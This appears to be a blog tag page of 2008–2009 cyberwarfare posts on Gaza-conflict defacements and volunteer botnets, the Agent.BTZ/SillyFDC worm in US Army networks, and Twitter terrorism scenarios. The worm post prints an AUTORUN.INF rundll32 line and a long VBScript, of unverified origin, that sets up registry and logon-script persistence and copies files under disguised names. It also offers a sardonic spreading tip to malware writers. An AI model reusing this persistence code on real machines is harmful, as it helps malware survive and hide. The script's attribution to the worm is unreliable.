Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘U.S Army

The Palestine-Israeli Conflict on the Web

with 14 comments

As any conflict that happened in the 21st century, there is usually a parallel conflict raging online as well. Either commanded by individuals or groups, which can be helped or not by either government agencies or other interest groups, acts of cyberwarfare are getting more and more common. The conflict in the Gaza strip offers a new opportunity to explore this kind of activity. This time, reports of websites defacement are numerous and ongoing, some reporting that malware is spreaded from hacked websites and even an Israeli botnet is starting to grow in order to attack Hamas supporters servers.

Reports are now growing over hundreds of websites defacements of Western websites by Palestinians supporters1. Various Palestinian groups and supporters have been vandalizing Israeli and other western nation commercial websites by putting propaganda and redirecting to jihadist forums and/or uploading malware on the hacked web servers. Hackers mentioned in the article are Team Evil, DNS Team, Tw!$3r, KaSPeRs HaCKeR CreW, PaLiSeNiaN HaCK, MoRoCcAn HaCkErZ.

Palestinian Propaghanda insert into Defaced Websites

Palestinian Propaganda insert into Defaced Websites

Recently, sites from the U.S Army and NATO have also been targeted by the vandals2. Archived versions of the hacked NATO webpage can be found here and here for the hacked version of the U.S Army website. For now, only defacements have been reported and no real attack has occured. Web defacement is a very easy attack to do on web servers with weak passwords. Most of the time, the attackers are script kiddies using software such as AccessDiver with a list of proxies and wordlists to conduct dictionaries attacks on servers. Using AccessDiver is fairly simple and many tutorials can be found on YouTube. Other ways include of course exploits and SQL injections attacks. Surprisingly, no DDoS attacks have been reported yet, but a group of Israeli students launch the “Help Israel Win” initiative3. At the time of writing, the website was online available through Google’s cache. Anoher website ( has been suspended. The goal was to develop a voluntary botnet dubbed “Patriot” to attack Hamas-related websites:

We have launched a new project that unites the computer capabilities of many computers around the world. Our goal is to use this power in order to disrupt our enemy’s efforts to destroy the state of Israel4.

The website offered a small executable to download. This bot would receive commands as a normal criminal bot would. Hamas-friendly sites like and were targeted by the IRC botnet. Still according to the article, the botnet has come under attack by unknown assaillants5. No definitive number is given as to how many machines the botnet is controlling, it might range from anything from 1000 to 8000 machines6. Very few detail is given on how the bot actually works.

There was a very similar attempt to create a “conscript” botnet known as the e-Jihad botnet that failed to realized its objective last year, as the tool was unsophisticated and rather crude7. The e-Jihad tool had the same objective as the Patriot botnet, which was to launch DDoS attacks against various targets.

e-Jihad 3.0 Screen

e-Jihad 3.0 Screen

Nevertheless, this kind of parallel attack is due to become a popular civilian option to attack servers. The only thing needed is to create a solid botnet, by using some of the most sophisticated criminal botnets and transform them into voluntary “cyber-armies”. There is one problem thought…how can we make sure it’s legitimate ? Making such programs open source ? But then you reveal your command and control servers and information that could make the enemy hijack our own botnet. It then all comes down to a question of trust…and of course, a clear and easy way to remove the bot anytime.

See also :

“Army Mil and NATO Paliarment hacked by Turks”, Roberto Preatoni,  Zone-H, (accessed on January 10, 2009)

1“Battle for Gaza Fought on the Web, Too”, Jart Armin, Internet Evolution, January 5, 2009, (accessed on January 10, 2009)

2“Pro-Palestine vandals deface Army, NATO sites”, Dan Goodin, The Register, January 10, 2009, (accessed on January 10, 2009)

3“Wage Cyberwar Against Hamas, Surrender Your PC”, Noah Shachtman, Danger Room, Wired, January 8, 2009,, (accessed on January 10, 2009)

4Copied from Google’s cache of


6Hacktivist tool targets Hamas”, John Leyden, The Register, January 9, 2008, (accessed on January 10, 2009)

7“E-Jihad vs. Storm”, Peter Coogan, Symantec, September 11, 2007, (accessed on January 10, 2009)

LATimes: Agent.BTZ Might be Concerted Cyber-Attack

leave a comment »

The Los Angeles Times reports that the reports about the Agent.BTZ worm spreading to the U.S Army networks might be a coordinated attacks originating from Russia[1].

The U.S Central Command is now infected with the worm and a high-classified network has been hit also.

It is unclear if the author of the article thinks that an infection is the same things as an ‘attack’ though. From the article:

“Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement.”

This infection has been report at the beginning of the month. This might just be sensationalism ofrcomplete ignorance from the author who might think than an infection by a worm made in Russia is a deliberate attack.

Officials would not describe the exact threat from agent.btz, or say whether it could shut down computers or steal information. Some computer experts have reported that agent.btz can allow an attacker to take control of a computer remotely and to take files and other information from it.

Then maybe they should just call Symantec or F-Secure or even better, Google it…or this if they are having a hard time..

See also:

“U.S Army Infected by Worm”, Jonathan Racicot, Cyberwarfare Magazine, November 11, 2008,

Add to FacebookAdd to NewsvineAdd to DiggAdd to Del.icio.usAdd to StumbleuponAdd to RedditAdd to BlinklistAdd to Ma.gnoliaAdd to TechnoratiAdd to Furl

[1] “Cyber-attack on Defense Department computers raises concerns”, Julian E. Barnes, Los Angeles Times,  November 28, 2008,,0,230046.story (accessed on November 28, 2008)

Written by Jonathan Racicot

November 28, 2008 at 1:23 pm

U.S Army Infected by Worm

with one comment

Wired reports that the U.S Army network is under assault by a variant of the SillyFDC worm called Agent-BTZ [1]. In order to restrain the infection, the U.S. Strategic Command has ban the use of every portable media on its network, this include USB keys, CDs, flash cards, floppies etc… Both the SIPRNet and NIPRNet are affected by this directive.

The SillyFDC worm infects systems through replication, i.e. by copying itself to various locations such as these folders[2]:

  • %System%
  • %Windir%
  • %Temp%
  • %UserProfile%
  • %ProgramFiles%
  • %SystemDrive%
  • %CommonProgramFiles%
  • %CurrentFolder%

Computer Virus Looming

Computer Virus Looming

It will also try to copy itself to any drive connected to the machine by scanning drives A:\ to Z:\, which is why the U.S Army is banning the use of portable media for the time being.  According to F-Secure who first discovered the worm[3], the variant in question will also create these files[4]:

  • %windir%\system32\muxbde40.dll
  • %windir%\system32\winview.ocx
  • %temp%\6D73776D706461742E746C62FA.tmp
  • %windir%\system32\mswmpdat.tlb

It will then install itself into the registry to make sure the worm starts every time the computer is booted. It will also attempt to download a JPG file from and create an AUTORUN.INF file on each drive on the computer, which contains the following:

shell\open\Command=rundll32.exe .\\[RANDOM].dll,InstallM

[RANDOM] is a randomly generated filename for the malicious DLL. Each time a new partition or a new drive is plugged in, Agent.BTZ will infect it immediately.

The SillyFDC worm doesn’t have any payload, as it only replicates itself through systems it finds using physical medias only. But its variant, the Agent.BTZ is a known Trojan dropper. A dropper is the kind of Trojan that will look to download and execute other malware. It’s surprising that it found its way into the U.S Army network. So that might be a tip for any worm/Trojan writer: add physical media replication to your malware like in the good ol’ days before e-mail, as it seems sending it by e-mail or click jacking is pretty well filtered in military networks, but peripherals such as USB keys are still often used by personnel. And this will surely open the eyes of the network admins of the U.S Army: scan anything plugged into the network.

Also, Graham Cluley, senior technology consultant at Sophos advises:

“… that users disable the autorun facility of Windows so removable devices such as USB keys and CD ROMs do not automatically launch when they are attached to a PC”

With whom I agree.


Since so many people asked me about this worm, I looked deeply into Internet and found this code, which seems to be part of the script of the Silly FDC worm (that’s the best I could do for now). This script basically copy files from one directory to another, renames the core of the worm and put it into another directory and add registry keys. I cannot confirm this as I found this on an Indonesian blog, so if anyone can look into this, please let me know. Thank you. Blog :

Dim fs,rg

Set fs = CreateObject(”scripting.filesystemobject”)
Set rg = CreateObject(””)

On Error Resume Next

rg.RegWrite “HKCR\.vbs\”, “VBSFile”
rg.RegWrite “HKCU\Control Panel\Desktop\SCRNSAVE.EXE”, 						”C:\WINDOWS\pchealth\helpctr\binaries\”
rg.RegWrite “HKCU\Control Panel\Desktop\ScreenSaveTimeOut”, 					“30”
rg.RegWrite “HKCR\MSCFile\Shell\Open\Command\”, 						“C:\WINDOWS\pchealth\Global.exe”
rg.RegWrite “HKCR\regfile\Shell\Open\Command\”, 						“C:\WINDOWS\pchealth\Global.exe”
rg.RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, 				“C:\WINDOWS\system32\dllcache\Default.exe”
rg.RegWrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, 				“C:\WINDOWS\system32\dllcache\Default.exe”
rg.RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”, 				“C:\WINDOWS\system\KEYBOARD.exe”
rg.RegWrite “HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\”, 					“C:\WINDOWS\Fonts\Fonts.exe”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName”,	”Local Group Policy”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath”,	”"
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID”,		”LocalGPO”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName”,		”Local Group Policy”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID”,		”Local”
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters”,	”"
rg.RegWrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script”,		"C:\WINDOWS\Cursors\Boom.vbs”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID”, 		“LocalGPO”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID”, 		“Local”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script”, 		“C:\WINDOWS\Cursors\Boom.vbs”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName”, 	“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID”, 		“LocalGPO”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName”, 		“Local Group Policy”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID”, 		“Local”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters”, 	“”
rg.RegWrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script”, 		“C:\WINDOWS\Cursors\Boom.vbs”

If Not fs.FileExists(”C:\WINDOWS\Fonts\Fonts.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\Fonts\Fonts.exe”)
If Not fs.FileExists(”C:\WINDOWS\pchealth\helpctr\binaries\”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\pchealth\helpctr\binaries\”)
If Not fs.FileExists(”C:\WINDOWS\pchealth\Global.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\pchealth\Global.exe”)
If Not fs.FileExists(”C:\WINDOWS\system\KEYBOARD.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\system\KEYBOARD.exe”)
If Not fs.FileExists(”C:\WINDOWS\system32\dllcache\Default.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\WINDOWS\system32\dllcache\Default.exe”)
If Not fs.FileExists(”C:\windows\system32\drivers\”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\system32\drivers\ “)
If Not fs.FileExists(”C:\windows\media\rndll32.pif “) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\media\rndll32.pif”)
If Not fs.FileExists(”C:\windows\fonts\tskmgr.exe”) Then
	fs.CopyFile (”C:\WINDOWS\Help\microsoft.hlp”), (”C:\windows\fonts\tskmgr.exe”)

See also:

“US Army bans USB devices to contain worm”, John Leyden, The Register, November 20, 2008, (accessed on November 20, 2008)

[1] “Under Worm Assault, Military Bans Disks, USB Drives”, Noah Shachtman, Danger Room, Wired, (accessed on November 20, 2008)

[2] “W32.SillyFDC”, Symantec, (accessed on November 20, 2008)

[3] “Troj/Agent-EMB”, Sophos, (accessed on November 20, 2008)

[4] “F-Secure Malware Information Pages: Worm:W32/Agent.BTZ”, F-Secure Corporation, (accessed on November 20, 2008)

Written by Jonathan Racicot

November 20, 2008 at 5:39 pm

Twitter Terrorism

leave a comment »

Today the U.S Army discovered something called Twitter, and realized that, as MySpace, Facebook, Google Earth and many other sites, it could be used by terrorists to plan attacks on landmarks or other targets. Although the Army report admits it has no proofs that Twitter is currently used by individuals for terrorism. The report details many interesting scenarios described in the report:

Scenario 1: Terrorist operative “A” uses Twitter with… a cell phone camera/video function to send back messages, and to receive messages, from the rest of his [group]… Other members of his [group] receive near real time updates (similar to the movement updates that were sent by activists at the RNC) on how, where, and the number of troops that are moving in order to conduct an ambush.

Scenario 2: Terrorist operative “A” has a mobile phone for Tweet messaging and for taking images. Operative “A” also has a separate mobile phone that is actually an explosive device and/or a suicide vest for remote detonation. Terrorist operative “B” has the detonator and a mobile to view “A’s” Tweets and images. This may allow “B” to select the precise moment of remote detonation based on near real time movement and imagery that is being sent by “A.”

Scenario 3: Cyber Terrorist operative “A” finds U.S. [soldier] Smith’s Twitter account. Operative “A” joins Smith’s Tweets and begins to elicit information from Smith. This information is then used for… identity theft, hacking, and/or physical [attacks]. This scenario… has already been discussed for other social networking sites, such as My Space and/or Face Book.[1]

Although this is true, for anyone having a clue about technology, this shouldn’t be any news. Any social networking site offers the opportunity to criminals and terrorists extensive information about someone. This can only by solved by educating people about privacy, and why it’s important. This is especially true for security and military personnel.

See also:

Noah Shachtman, “Spy Fears: Twitter Terrorists, Cell Phone Jihadists”, October 24, 2008, (accessed on October 27, 2008)

[1] “Sample Overview: alQaida-Like Mobile Discussions & Potential Creative Uses” (accessed on October 27, 2008)

Written by Jonathan Racicot

October 27, 2008 at 3:36 pm